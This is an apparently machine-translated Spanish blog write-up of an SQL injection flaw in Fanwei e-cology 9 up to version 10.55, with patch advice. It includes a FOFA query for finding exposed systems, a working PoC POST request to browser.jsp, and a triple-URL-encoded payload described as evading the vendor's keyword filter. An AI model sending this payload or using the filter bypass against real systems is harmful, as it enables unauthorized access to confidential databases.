Vuelve a aparecer la vulnerabilidad de inyección SQL Fanwei e-cology9【QVD-2023-5012】

Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para participar en pruebas ilegales. Cualquier consecuencia directa o indirecta y las pérdidas causadas por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Las consecuencias adversas tienen nada que ver con el autor del artículo. Este artículo es solo para fines educativos.

1. Introducción del producto

e-cology, una plataforma de aplicación de gestión colaborativa pan-micro, es un conjunto de portal de información empresarial, gestión de documentos de conocimiento, gestión de flujo de trabajo, gestión de recursos humanos, gestión de relaciones con clientes, gestión de proyectos, gestión financiera, gestión de activos, gestión de la cadena de suministro, y funciones de centros de datos Una plataforma de gestión colaborativa a gran escala para empresas.

2. Visión general de la vulnerabilidad

​ Existe una vulnerabilidad de inyección SQL en Fanwei e-cology 9. Los atacantes remotos no autenticados pueden usar esta vulnerabilidad para obtener información confidencial de la base de datos, y una mayor explotación puede llevar a que se cargue el sistema de destino.

3. Ámbito de influencia

Versión afectada

Fanwei e-cología9 <= 10.55

versión no afectada

Fanwei e-cología9 >= 10.56

Cuarto, reproducir el medio ambiente.

FOFA: app="Panwei-Sistema Empresarial Colaborativo"

inserte la descripción de la imagen aquí

5. Recurrencia de la vulnerabilidad

Acceda al entorno vulnerable, burp captura paquetes y envía el módulo repetidor para su uso

inserte la descripción de la imagen aquí
PoC

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651


isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

Nota: se deben pasar tres parámetros en el POC
1. isDis debe ser 1
2. browserTypeId corresponde al método
3. la palabra clave es el punto de inyección, y la codificación de URL debe realizarse 3 veces para escapar del mecanismo de filtrado de Panwei (lista negra de Panwei mecanismo pondrá palabras clave reemplazadas por caracteres de doble ancho)

Consulta la información de la versión de la base de datos

inserte la descripción de la imagen aquí
Reproducido con éxito

Dragón POC

inserte la descripción de la imagen aquí

6. Sugerencias de reparación

En la actualidad, se ha lanzado el parche de seguridad oficial y se recomienda que los usuarios afectados actualicen a la versión 10.56 o superior lo antes posible.

https://www.weaver.com.cn/cs/securityDownload.asp

Supongo que te gusta

Origin blog.csdn.net/holyxp/article/details/131867577
Recomendado
Clasificación